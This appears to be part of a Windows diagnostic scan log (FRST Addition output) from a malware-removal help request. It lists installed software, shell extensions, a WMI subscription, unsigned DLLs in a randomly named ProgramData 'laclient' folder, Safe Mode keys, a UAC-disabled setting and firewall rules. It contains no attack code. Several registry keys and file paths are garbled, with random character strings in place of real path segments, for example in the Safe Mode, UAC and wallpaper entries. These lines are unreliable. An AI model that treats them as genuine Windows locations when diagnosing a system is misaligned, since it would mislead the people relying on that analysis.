Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5067 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.0.0.102 - Intel Corporation)
Intel(R) Wireless Bluetooth(R) (HKLM\...\{00000070-0190-4FD1-8F3D-148929CC1385}) (Version: 19.70.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{6da487a6-c50d-494e-aaa0-6d8ce9c37ef3}) (Version: 20.10.2 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.42 - Irfan Skiljan)
iRoot (HKLM-x32\...\{1295E43F-382A-4CB2-9E0F-079C0D7401BB}_is1) (Version: 1.8.9.21144 - SING)
iTunes (HKLM\...\{8F087FFD-35AC-4707-8565-58E5619CBF18}) (Version: 12.10.0.7 - Apple Inc.)
Java 8 Update 241 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
JDownloader 2 (HKLM-x32\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kodi (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Kodi) (Version: - XBMC Foundation)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.10.84 - Logitech)
Master PDF Editor 3.6 (HKLM\...\Master PDF Editor 3_is1) (Version: 3.6.30 - Code Industry Ltd.)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6215.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27012 (HKLM-x32\...\{427ada59-85e7-4bc8-b8d5-ebf59db60423}) (Version: 14.16.27012.6 - Microsoft Corporation)
Miro Video Converter (HKLM-x32\...\Miro Video Converter) (Version: 0.8.0 - Participatory Culture Foundation)
Mozilla Firefox 72.0.2 (x64 sk) (HKLM\...\Mozilla Firefox 72.0.2 (x64 sk)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.4 - Mozilla)
MPC-HC 1.7.13 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.13 - MPC-HC Team)
NeoDownloader 2.9.5 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.9.5 - Neowise Software)
NVIDIA Grafický ovládač 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 419.72 - NVIDIA Corporation)
NVIDIA Softvér systému s podporou technológie PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenOffice 4.1.5 (HKLM-x32\...\{E177AC33-EC9C-4537-8996-37ED331D9227}) (Version: 4.15.9789 - Apache Software Foundation)
Ovládací panel NVIDIA 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 419.72 - NVIDIA Corporation) Hidden
Podpora Apple aplikácií (32-bit) (HKLM-x32\...\{FD52A2FF-4D16-49C4-A2CD-DAC752C18BA2}) (Version: 8.0 - Apple Inc.)
Podpora Apple aplikácií(64-bit) (HKLM\...\{9B061D60-4E2C-4987-BFFD-423E3D477660}) (Version: 8.0 - Apple Inc.)
Product Improvement Study for HP LaserJet MFP M28-M31 (HKLM\...\{B50C256D-80E2-473E-9546-0410162F44D5}) (Version: 46.2.2636.18185 - HP Inc.)
PSPad editor (HKLM-x32\...\PSPad editor_is1) (Version: 4.6.2.2750 - Jan Fiala)
qTox (HKLM-x32\...\qTox) (Version: 1.13.0 - The qTox Project)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.1500.0 - SAMSUNG Electronics Co., Ltd.)
SoftEther VPN Client (HKLM\...\softether_sevpnclient) (Version: 4.29.9680 - SoftEther VPN Project)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.0 - Ghisler Software GmbH)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Win32DiskImager version 1.0.0 (HKLM-x32\...\{3DFFA293-DF2C-4B23-92E5-3433BDC310E1}}_is1) (Version: 1.0.0 - ImageWriter Developers)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
XnView 2.39 (HKLM-x32\...\XnView_is1) (Version: 2.39 - Gougelet Pierre-e)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{ED90173A-3B4C-4E7E-B9CF-79714425D4B5}\InprocServer32 -> C:\Program Files (x86)\PSPad editor\pspshellx64.dll () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2018-12-03] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1: [WinCDEmu] -> {D0E37FD2-F675-426F-B09A-2CF37BA46FD5} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers3: [FTShellContext] -> {AFF81F7B-6942-40c4-AADA-7214EF7B6DD1} => C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2019-07-12] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-03-18] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1_S-1-5-21-1214245489-2610092731-2950206201-1000: [EditWithPSPad] -> {ED90173A-3B4C-4E7E-B9CF-79714425D4B5} => C:\Program Files (x86)\PSPad editor\pspshellx64.dll [2014-11-02] () [File not signed]
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
==================== Loaded Modules (Whitelisted) =============
2018-01-08 18:39 - 2014-11-02 18:45 - 000029184 _____ () [File not signed] C:\Program Files (x86)\PSPad editor\pspshellx64.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000144896 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\libssh2.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000077824 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\zlib.dll
2011-09-16 14:52 - 2011-09-16 14:52 - 000053920 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthCopyHook.dll
2011-09-16 14:53 - 2011-09-16 14:53 - 000020128 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\athr_debug.dll
2011-09-16 14:54 - 2011-09-16 14:54 - 000040608 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BPP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000045216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BTBIP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000161440 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000504480 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\filetransfer.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000092832 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\gatts.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000106144 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\GOEP.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000080032 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Handsfree.dll
2011-09-16 15:04 - 2011-09-16 15:04 - 000093856 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\L2capLib.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 000310432 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ObjPush.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 004974752 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\OutLookLib.dll
2011-09-16 15:07 - 2011-09-16 15:07 - 000073888 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\PhoneBook.DLL
2011-09-16 15:07 - 2011-09-16 15:07 - 000065184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\RfcommLib.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000109216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sesmgr.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000284320 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000041632 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sim.DLL
2011-09-16 15:08 - 2011-09-16 15:08 - 000129184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\skypeagent.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000061088 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Sync.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000030368 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\utils.DLL
2018-02-15 20:11 - 2016-03-21 23:15 - 000027648 _____ (Copyright (c) Code Industry Ltd ) [File not signed] C:\Windows\System32\mpelocalmon.dll
2018-01-09 21:13 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2018-01-11 15:12 - 2013-04-11 11:10 - 000073728 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.dll
2019-04-02 17:10 - 2015-02-27 09:35 - 000489984 _____ (Newtonsoft) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\Newtonsoft.Json.dll
2017-02-12 01:28 - 2015-09-28 19:08 - 000255488 _____ (Sysprogs OU) [File not signed] C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000355840 _____ (The cURL library, hxxp://curl.haxx.se/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBCURL.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBEAY32.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\SSLEAY32.dll
2019-05-12 10:51 - 2019-05-12 10:51 - 005196800 _____ (University of Tsukuba) [File not signed] C:\Program Files\SoftEther VPN Client\VpnGatePlugin_x64.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000087552 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCollect.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000197632 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCommon.dll
==================== Alternate Data Streams (Whitelisted) ========
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\localhost -> localhost
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-14 03:34 - 2020-01-22 20:05 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGizadie plochy.bmp
DNS Servers: 192.168.0.1
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGi => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [{0D112C7C-66E1-4D54-AEB0-EE8E3A163F04}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E7E2670E-7962-4AFA-8A93-AD4B754A76A2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{C9127F07-56E6-49D5-A059-BE4717D6DCD0}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{046EB926-BC54-4B7B-8553-B4B8557D4320}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{33BE3F4B-2176-4BF9-8DAD-71F2993C7E22}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{034F37EC-98CC-400F-A7F2-54D67FA53CE7}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{72EA0069-1AE7-4F99-B211-021D3B204CC0}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [UDP Query User{7FF58BC0-AE02-48BE-B6F5-0B8F96943D04}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [{0957BBF0-D65F-4D9C-B51D-C765EA416DF7}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel(R) Wireless Connectivity Solutions -> )
FirewallRules: [TCP Query User{88E30C4A-334F-4EB7-935A-7BC2452751D3}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [UDP Query User{4C22E9E2-776E-4273-B65F-CB1E71B0E17B}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [TCP Query User{D5552FCB-7B8C-4A55-BCDA-866776675FD0}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [UDP Query User{FDC9932A-896B-42DE-A1CE-0406F806B579}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [{D75DA9A3-9755-4F80-98D4-2EF07ED17614}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6A3D486A-8B54-46A8-90CD-2B592EB9EBF6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9050C82E-1247-429A-85DB-56FE67C39482}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3D1F2024-BC68-44C6-9035-211A5E556D48}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{611DFF0B-0DAB-4871-9AD2-91E4F9D70647}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{0FDF3415-E5D8-493C-96D4-75A240355D2B}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{DB7D1A44-D27A-4E0E-85C6-691CEDCD37BC}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{95E4E855-A7CB-4193-AA0F-7B889EEF6193}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{F7955E18-9789-4EEB-9C13-711CCA694B6A}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{99CE8752-A44F-4307-A1EE-4F54DEA2A760}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{0ADB4278-50BC-4AFE-AAE9-EFE1BB2E4547}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [{A79F7F72-CB8D-485D-B340-54C21C43C48B}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\EWSProxy.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2936F1E8-01AA-413E-BF0B-9B7345CD6630}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{795728F4-FA31-4D9B-A4AB-78BB97087FA6}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{CC296BD8-C7AE-41FF-ADE9-3E0587CC9E2F}] => (Allow) LPort=5357
FirewallRules: [{35CA4271-53ED-4C97-986D-044960622E1F}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{7AC26099-BE7F-4BFA-BEAF-FB184655BFC1}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
